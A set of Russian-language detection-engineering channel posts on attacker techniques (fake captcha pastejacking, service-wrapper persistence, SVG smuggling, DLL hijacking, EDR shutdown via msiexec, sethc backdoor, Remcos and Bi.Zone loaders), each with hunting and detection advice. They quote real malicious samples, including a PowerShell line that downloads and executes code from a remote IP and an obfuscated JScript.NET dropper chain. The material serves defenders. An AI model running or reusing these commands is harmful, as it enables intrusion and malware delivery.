Всем привет! 💻✌️

Сегодня рассмотрим технику fake captcha

Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖

Капча необычная, есть нюанс - используется техника "clipboard hijacking" или "pastejacking" - в буфер обмена добавляется вредоносный скрипт, далее нужно нажать сочетание клавиш Win+R, далее в появившемся окне нажать Ctrl+V , и подтвердить, что вы молодец - Verify 🦣

В буфер обмена вставлялся вот такой скрипт:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

Для формирования url, считается количество секунд между двумя датами.

🔭 Что делать:

🔤 запретить пользователям Win + R ❌

🔤 отслеживать создание новых ключей в ветке реестра HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\

Для ханта, необходимо собрать значения ключей HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ всех пользователей, и провести анализ. Можно предусмотреть исключения, что-то могли использовать админы

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наткнулся на прикольную технику для кражи учетных данных)

Утилита называется Win10CredsThief

Сценарий использования на red team может быть такой: пробили тачку и не получается продвинуться, повыситься, получить хеш и т.п. И тут в дело вступает социалка, Win10CredsThief - это html страница, которая мимикрирует под экран блокировки Windows10. Написано довольно хорошо и пользователь вряд ли что-то заподозрит

Для убедительности лучше проверять какое изображение для блокировки используется в организации, чтобы не вызвать лишних подозрений

🔭 Что делать:
🔤 отслеживать запуск браузера в режиме киоска --kiosk

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Бывает, что нужно создать службу, но соответствующего файла нет? Злоумышленники используют NSSM (Non-Sucking Service Manager) для закрепления в системе

NSSM - это инструмент, который позволяет запускать любой исполняемый файл как службу.

⚠️ Пример использования:
У хакеров есть вредоносный файл, который не может запускаться как служба, nssm выступает в роли обертки для него

🔭 Что делать:
🔤 отслеживаем создание процесса с параметрами

Description = "The non-sucking service manager" or 
Product = "NSSM 64-bit"

Можем похантить:

🔤 наличие куста реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\NSSM, если существует в нем можем посмотреть EventMessageFile - путь к nssm.exe

🔤 наличие логов в журнале Application от провайдера nssm

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng

Создается служба из консоли cmd или powershell:

sc create "MyServiceName" start= auto binPath= "C:\Path\To\srvany-ng.exe"

это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)

Для мониторинга можем использовать следующую информацию о файле:

Description = Run any Windows application as a Service.
Product = srvany-ng
Company = Anthony Birkett
OriginalFileName = srvany-ng.exe

🔤 Правило корреляции можно сделать на отслеживание цепочки запуска процессов svchost.exe -> *.exe -> *.exe
Скорее всего нужно будет профилировать

🔤 Для хантинга можем поискать следующую информацию в реестре:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*\Parameters\ ключ Application - путь к файлу который запустит служба

Дополнительно в Application могут быть ключи:

AppDirectory 
AppParameters
AppEnvironment
RestartOnExit

⚠️ Можно проверить, что файл службы имеет расширение exe и файл в Application - тоже имеет расширение exe

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Получают ли Ваши сотрудники файлы SVG?

ЛК представили небольшой обзор злоупотребления SVG.

SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML

SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)

🔭 Обнаружение:

🔤 Создание svg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.svg"

🔤 Детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"

🔤 Мониторить создание процессов у которых в аргументах содержится ".*svg\s.*"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB

Для монтирования сетевой папки, часто используют команду net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak

🔭 Обнаружение:

🔤 Мониторим запуск net.exe или net1.exe с аргументами use

🔤 Отслеживаем создание процессов, которые начинаются с \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q:

🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети

🔤 В журнале Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям

🎯 Для хантинга можем проверить:

🔤 ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.

Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:

🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution

🔭 Обнаружение:

🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса

🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущим

🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей c:\windows\system32 c:\windows\syswow64 c:\windows\winsxs

🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)

Скорее всего будет очень шумно...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.

Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.

Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в %WINDIR%\Installer

🔭 Обнаружение:

🔤 Обнаруживаем локальные попытки установки edr/av msiexec /i или восстановления msiexec /fa
🔤 Обнаруживаем попытки использования пакетов из %WINDIR%\Installer, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера MsiInstaller


События при нормальной установке пакета

1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)

События при удалении пакета

11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию) 

Событие при обновлении конфигурации

11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета

События при завершении установки с ошибкой

1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)

Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec

Дополнительно информацию об установленных пакетах можно посмотреть в реестре - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\<SID>\Products\<GUID>\InstallProperties . В этом разделе реестра есть интересный ключ - InstallSource по которому можно похантить аномалии в установке EDR и т.п.

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it

#detection@detectioneasy

Всем привет 💻✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит sethc.exe (utilman.exe) на cmd.exe, и создаст нового пользователя?

Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает 😄)

Плохие парни нажимают пару раз shift и получают права system 👤на серваке

🔭 Что же нам делать?

🔤 отслеживаем копирование системных файлов sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя winlogon.exe и пользователя system
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память. 😈

Что происходит❓

Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).

При открытии срабатывает цепочка:

🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп HKCU:\…\CurrentVersion\Run, загрузки hta, ps1 и decoy-файла в C:\Users\Public, добавление директории C:\Users\Public в исключения Windows Defender (Add-MpPreference -ExclusionPath). В закреп добавлялась powershell-команда для запуска hta_)
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через VirtualAlloc, копирует шеллкод и запускает его через CallWindowProcW, запускается Remcos RAT

Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc


🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в HKLM\...\Run и HKCU\...\Run
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell VirtualAlloc, CallWindowProcW
🔤 Добавление исключений в defender (в AV)

Может получиться интересный хант

Мы можем собрать и группировать исключения AV с хостов. 
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_) 

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)

Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source

Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠

🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.

Давайте рассмотрим одну из них

🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll

🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя %USERPROFILE%, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INI

set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a

🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда start с применением обфускации

^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit

🔤 Если файла из шага 2 нет, то проверяется наличие unzip.exe (скомпилированный JScript.NET), который распаковывает фальшивый INI-файл

if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") 

🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем %TEMP%\unzip.exe

(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")

Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:

🔤 При обращении к серверу используется следующая строка заголовка User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 Создается рабочий каталог %APPDATA%\74EJ6RTFKKRS
🔤 Для закрепления создается startapp.bat в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

🔭 Обнаружение

🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование forfiles.exe и start.exe
🔤 создание скриптов в директории автозагрузки

Похантить можно:
🔤 user-agent User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

#detection@detectioneasy
#ttp@detectioneasy